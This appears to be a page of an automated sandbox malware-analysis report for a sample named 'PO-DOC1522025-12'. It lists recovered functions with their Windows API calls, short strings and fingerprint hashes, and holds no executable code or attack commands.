Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: 58a4140ec6c088bfb7660f6d16dbb1320d5978e8fb013305239cb622cb75cc91
Instruction ID: d1af6292444f21981fc726b26f53bf7ed9ec2b12b1119876212313db93c82275
Opcode Fuzzy Hash: 58a4140ec6c088bfb7660f6d16dbb1320d5978e8fb013305239cb622cb75cc91
Instruction Fuzzy Hash: 9F11C4B920A3119FE7208F14DC08FD27FFCEB05B00F10896AA616D6591D770EA44DB90

Function 001AB0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,001AACD3,?,00008000), ref: 001AB0C4
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,001AACD3,?,00008000), ref: 001AB0E9
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,001AACD3,?,00008000), ref: 001AB0F3
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,001AACD3,?,00008000), ref: 001AB126

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: 8cc6f8a32ea1a7fde43f4d03b134c46c0efc883e69eae6f685cd22b98708fb6c
Instruction ID: 66d34676667986ddb3db1a4b3756674a44254dcb2f60ab69306639a72d3fb8f9
Opcode Fuzzy Hash: 8cc6f8a32ea1a7fde43f4d03b134c46c0efc883e69eae6f685cd22b98708fb6c
Instruction Fuzzy Hash: 2F116D75C0666DE7CF04AFE4E9A86EEBF78FF0A711F114496E941B2182CB305650CB91

Function 001D7E14 Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 001D7E33
ScreenToClient.USER32(?,?), ref: 001D7E4B
ScreenToClient.USER32(?,?), ref: 001D7E6F
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 001D7E8A

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: 89496995c04a76450006dec6781b54150f6ea08c8bad9f7beb64e212d26324dd
Instruction ID: e0029f3608a2b307712ad0b5df288ab7d06da03f4b99d04a0cce21c0928bc5ee
Opcode Fuzzy Hash: 89496995c04a76450006dec6781b54150f6ea08c8bad9f7beb64e212d26324dd
Instruction Fuzzy Hash: C11143B9D0124AAFDB41CF98C884AEEBBF5FB18310F505156E915E2610D735AA94CF90

Function 001A2DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 001A2DC5
GetWindowThreadProcessId.USER32(?,00000000), ref: 001A2DD6
GetCurrentThreadId.KERNEL32 ref: 001A2DDD
AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 001A2DE4

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: af17a1000fa4928e070a51ebfaec0bfcda257eba46847e18728ab2110589c627
Instruction ID: 70b927f17055e72d22d9d6b5e67bbde3eeafa786b2bfa4ae85d5fcf61f57a055
Opcode Fuzzy Hash: af17a1000fa4928e070a51ebfaec0bfcda257eba46847e18728ab2110589c627
Instruction Fuzzy Hash: ADE06D71103225BADB201BA69C0DEEB3F6CEF43BA1F000416F505D15819AA4C880C6F0

Function 001D8863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00159639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00159693
Part of subcall function 00159639: SelectObject.GDI32(?,00000000), ref: 001596A2
Part of subcall function 00159639: BeginPath.GDI32(?), ref: 001596B9
Part of subcall function 00159639: SelectObject.GDI32(?,00000000), ref: 001596E2

MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 001D8887
LineTo.GDI32(?,?,?), ref: 001D8894
EndPath.GDI32(?), ref: 001D88A4
StrokePath.GDI32(?), ref: 001D88B2

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 5972598863771347024d7ecb5e83b5da2e19f153e91eedbd9d7645405c2582ab
Instruction ID: 9378d8a142e007910f83493a8c1b00e891066800d780456f1f2909d8200b8f03
Opcode Fuzzy Hash: 5972598863771347024d7ecb5e83b5da2e19f153e91eedbd9d7645405c2582ab
Instruction Fuzzy Hash: B4F03A3A046299FADB125F94AC0DFCA3B59AF16311F048002FA11651E1CB755561DFE5

Function 001598B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 001598CC
SetTextColor.GDI32(?,?), ref: 001598D6
SetBkMode.GDI32(?,00000001), ref: 001598E9
GetStockObject.GDI32(00000005), ref: 001598F1

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Color$ModeObjectStockText
String ID:
API String ID: 4037423528-0
Opcode ID: 3418e80532398347235d1ac238895dc4385aca7fbbc96b99a09d582552087ebb
Instruction ID: bd73a60f5cafb77630cdbaa122297ca273fc1f9e3a5397edc2a2b14d23a5b62c
Opcode Fuzzy Hash: 3418e80532398347235d1ac238895dc4385aca7fbbc96b99a09d582552087ebb
Instruction Fuzzy Hash: C8E06D31246291EAEF215B74BC0DBE83F21AB52336F04871AF6FA584E1C3714680DB11

Function 001A162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 001A1634
OpenThreadToken.ADVAPI32(00000000,?,?,?,001A11D9), ref: 001A163B
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,001A11D9), ref: 001A1648
OpenProcessToken.ADVAPI32(00000000,?,?,?,001A11D9), ref: 001A164F

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 66ad14f2796259376129af5997427e640f3aee19375349e381345db5394a2b72
Instruction ID: 03398e7d9fc27fdaf1273539c10448ca221e33a86297dbd0844ff1dad2326a1d
Opcode Fuzzy Hash: 66ad14f2796259376129af5997427e640f3aee19375349e381345db5394a2b72
Instruction Fuzzy Hash: 6BE08635603212EBD7201FF09E0DB473B7CAF557A1F144C09F245C9080D7744480C790

Function 0019D858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0019D858
GetDC.USER32(00000000), ref: 0019D862
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0019D882
ReleaseDC.USER32(?), ref: 0019D8A3

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 2d7110bddd3612dbe3324d80481a8101e310fb9602983ec747d4b2b797cad437
Instruction ID: 440fbc9afcbe89b910fb8ee4d88f1fc10cf8eaeedc8292e3416fa4e7ea6b9ff9
Opcode Fuzzy Hash: 2d7110bddd3612dbe3324d80481a8101e310fb9602983ec747d4b2b797cad437
Instruction Fuzzy Hash: BAE01AB4802206DFCF419FA4D80866DBBB1FB08311F15880AF806E7750C7389985EF80

Function 0019D86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0019D86C
GetDC.USER32(00000000), ref: 0019D876
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0019D882
ReleaseDC.USER32(?), ref: 0019D8A3

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: ec0e2d33c0415f80698f0f1a1646f5be5802a584069800bb54cc9b999dac4ddd
Instruction ID: fa30728835824eee6c17c608ebbdb1ac2f17e4b52fc3c376c1403429ec368ebd
Opcode Fuzzy Hash: ec0e2d33c0415f80698f0f1a1646f5be5802a584069800bb54cc9b999dac4ddd
Instruction Fuzzy Hash: 1FE01A74802201DFCB509FA4D80866DBBB1FB08311B14880AF806E7750C7389945DF80

Function 001B4D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00147620: _wcslen.LIBCMT ref: 00147625

WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 001B4ED4

Strings

LPT, xrefs: 001B4DFB
*, xrefs: 001B4E10

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Connection_wcslen
String ID: *$LPT
API String ID: 1725874428-3443410124
Opcode ID: 2434d24e8962eccc571b2650076b76b33369583792e5a9e57bee3d785a964706
Instruction ID: edf992a8f91b6359f39ecbf46afe38b3249f2554dbaac33e98868413c299c199
Opcode Fuzzy Hash: 2434d24e8962eccc571b2650076b76b33369583792e5a9e57bee3d785a964706
Instruction Fuzzy Hash: 73914B75A002149FDB14DF58C484EAABBF1AF49304F19C09DE84A9F3A2D735EE85CB91

Function 001C7771 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(0019569E,00000000,?,001DCC08,?,00000000,00000000), ref: 001C78DD

Part of subcall function 00146B57: _wcslen.LIBCMT ref: 00146B6A

CharUpperBuffW.USER32(0019569E,00000000,?,001DCC08,00000000,?,00000000,00000000), ref: 001C783B

Strings

<s , xrefs: 001C77C8

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: BuffCharUpper$_wcslen
String ID: <s
API String ID: 3544283678-3981233947
Opcode ID: 73794bb3ba6d0fed2879eb5608b8d2d41f0d587ad6ff1f9730c5a4dd31e25bff
Instruction ID: 79dcd3f0ebccd62e6a4644d38705aea9e85817070d1dacfff80994505d432fe5
Opcode Fuzzy Hash: 73794bb3ba6d0fed2879eb5608b8d2d41f0d587ad6ff1f9730c5a4dd31e25bff
Instruction Fuzzy Hash: E2612C72914219AACF04EFA4DC91EFDB378BF38704B444529E642A71A1EB749A05DBA0

Function 0015E187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

#, xrefs: 0015E1B1

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 25001c2692a854771408bebcb8020dea610fbfbddb2ba2c3f6a619f8615e5d3d
Instruction ID: 4fd751cba138a7330bc0acd0be9d1aa34a5b009be2be51fcd19d8e376f29c185
Opcode Fuzzy Hash: 25001c2692a854771408bebcb8020dea610fbfbddb2ba2c3f6a619f8615e5d3d
Instruction Fuzzy Hash: A051F175904246DFDF1DDFA8C481ABA7BE8EF25310F244055ECA19B2D0D7349E86CBA1

Function 0015F291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 0015F2A2
GlobalMemoryStatusEx.KERNEL32(?), ref: 0015F2BB

Strings

@, xrefs: 0015F2AF

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 863f091553ad633069fae15b091466f19517cfc7ddd43567f04c4c81fda5f47b
Instruction ID: 659161b1cd7652ae21756b8b40f7e5be5de4ae2daea8594422abecc8d1c7ea3f
Opcode Fuzzy Hash: 863f091553ad633069fae15b091466f19517cfc7ddd43567f04c4c81fda5f47b
Instruction Fuzzy Hash: 47515671409744ABD320AF54DC86BABBBF8FF95300F81884DF1D9421A5EB318569CB67

Function 001C5745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 001C57E0
_wcslen.LIBCMT ref: 001C57EC

Strings

CALLARGARRAY, xrefs: 001C57E6, 001C57EB

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: BuffCharUpper_wcslen
String ID: CALLARGARRAY
API String ID: 157775604-1150593374
Opcode ID: f4bfb70589bd6d52fbe91a7ba3c02738b0969457693786f3e45eb5595a8da160
Instruction ID: 379e4c822782dd35716905ba69c05f0e43dc12fd52167ab200217ec40317c00e
Opcode Fuzzy Hash: f4bfb70589bd6d52fbe91a7ba3c02738b0969457693786f3e45eb5595a8da160
Instruction Fuzzy Hash: 0E418E31E002099FCB14DFA9C885DAEBBB6EF69354F14406DF515AB291E730ED81CBA0

Function 001BD0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 001BD130
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 001BD13A

Strings

|, xrefs: 001BD10B

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: CrackInternet_wcslen
String ID: |
API String ID: 596671847-2343686810
Opcode ID: 6fa9f0f0f6c970f267d9c186d920203ecd45f833ada8c66928e2d97ecb5aa5e8
Instruction ID: 6a7bd4e7d086c8662589adf74576558c44498e963331e79414c19ebbb02d119c
Opcode Fuzzy Hash: 6fa9f0f0f6c970f267d9c186d920203ecd45f833ada8c66928e2d97ecb5aa5e8
Instruction Fuzzy Hash: D1313C71D01219ABCF15EFA4DC85AEEBFB9FF19304F100059F815B6162EB31AA56CB60

Function 001D356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 001D3621
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 001D365C

Strings

static, xrefs: 001D35BC

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: d7268bc74fdf09ec64ade0bc541aa612cdd53ebda98ab3001ee79a4ea8a7541c
Instruction ID: cb7f381069775604c49a01d96454f3bf01bb6bcfe29fa577e6d49c0204f64b55
Opcode Fuzzy Hash: d7268bc74fdf09ec64ade0bc541aa612cdd53ebda98ab3001ee79a4ea8a7541c
Instruction Fuzzy Hash: 3531BC71100204AEDB209F28DC80EFB73A9FF98760F00861AF8A597290DB31ED81D7A1

Function 001D4537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 001D461F
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 001D4634

Strings

', xrefs: 001D458E

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 38ea29b4d31ddc00a1ca803a8631c5d401984aeb55b878dc4379c2779c31fd6b
Instruction ID: aee73bf6bab2029c860e0b673304cc6a80c798a655c974afcac832b749f32750
Opcode Fuzzy Hash: 38ea29b4d31ddc00a1ca803a8631c5d401984aeb55b878dc4379c2779c31fd6b
Instruction Fuzzy Hash: EC312574A0130A9FDB14CFA9D981BDABBB6FF09300F10406AE905AB391D770E941CF90

Function 001D31EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 001D327C
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 001D3287

Strings

Combobox, xrefs: 001D3249

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 46d1c70c3a34c8c9a761fd1e470ec8220453c5e11ee4a8d1d421fa254d1a5b35
Instruction ID: a694430c8b82da6dbf0c2e29f4bb3b96782ac6010dd070609ad1bdd72f90dd8b
Opcode Fuzzy Hash: 46d1c70c3a34c8c9a761fd1e470ec8220453c5e11ee4a8d1d421fa254d1a5b35
Instruction Fuzzy Hash: 7011B271B002087FFF259E54DC85EFB3B6AEB943A4F10412AF92897390D7719D518761

Function 001D3710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 0014600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0014604C
Part of subcall function 0014600E: GetStockObject.GDI32(00000011), ref: 00146060
Part of subcall function 0014600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0014606A

GetWindowRect.USER32(00000000,?), ref: 001D377A
GetSysColor.USER32(00000012), ref: 001D3794

Strings

static, xrefs: 001D3757

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

